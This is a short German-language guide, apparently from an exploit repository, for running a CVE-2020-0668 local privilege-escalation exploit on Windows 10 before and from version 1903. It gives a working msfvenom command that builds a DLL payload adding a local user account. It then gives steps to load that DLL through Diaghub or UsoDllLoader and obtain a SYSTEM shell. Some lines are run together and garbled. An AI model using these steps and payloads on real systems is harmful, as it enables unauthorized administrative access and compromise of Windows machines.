
CVE-2020-0668-Exploit für Version < win10 v1903 und Version >= win10 v1903 zum Laufen bringen
CVE-2020-0668-Exploit für Version < win10 v1903 und Version >= win10 v1903 zum Laufen bringen
Der PowerShell-Exploit funktioniert auf Version < win10 v1903 mit Diaghub.
evil.dll mit msfvenom erzeugen
msfvenom -p windows/x64/exec CMD="net user test test /add" -f dll > evil.dllexp.ps1 mit PowerShell ausführenDiaghub.exe C:\ProgramData evil.dll ausführen, um die DLL zu laden und den Benutzer hinzuzufügen.
Der PowerShell-Exploit funktioniert auf Version >= win10 v1903 mit UsoDllLoader.
exp.ps1 mit PowerShell ausführenUsoDllLoader.exe ausführen, um eine System-Shell zu erhalten
Eine x86-Release-Version von SysTracingPoc für Issue. Der Exploit funktioniert wegen UsoLoadDll auf Version >= win10 v1903.
Ein .NET-PoC. Wenn du dir C:\Windows\System32\evil.dll ansiehst und sie in evil.txt umbenennst.
Du wirst feststellen, dass es keine DLL-Datei ist. Sie enthält nur ein Tracing-Protokoll.
Ein PowerShell-PoC. Auch hier nur ein Tracing-Protokoll in evil.dll.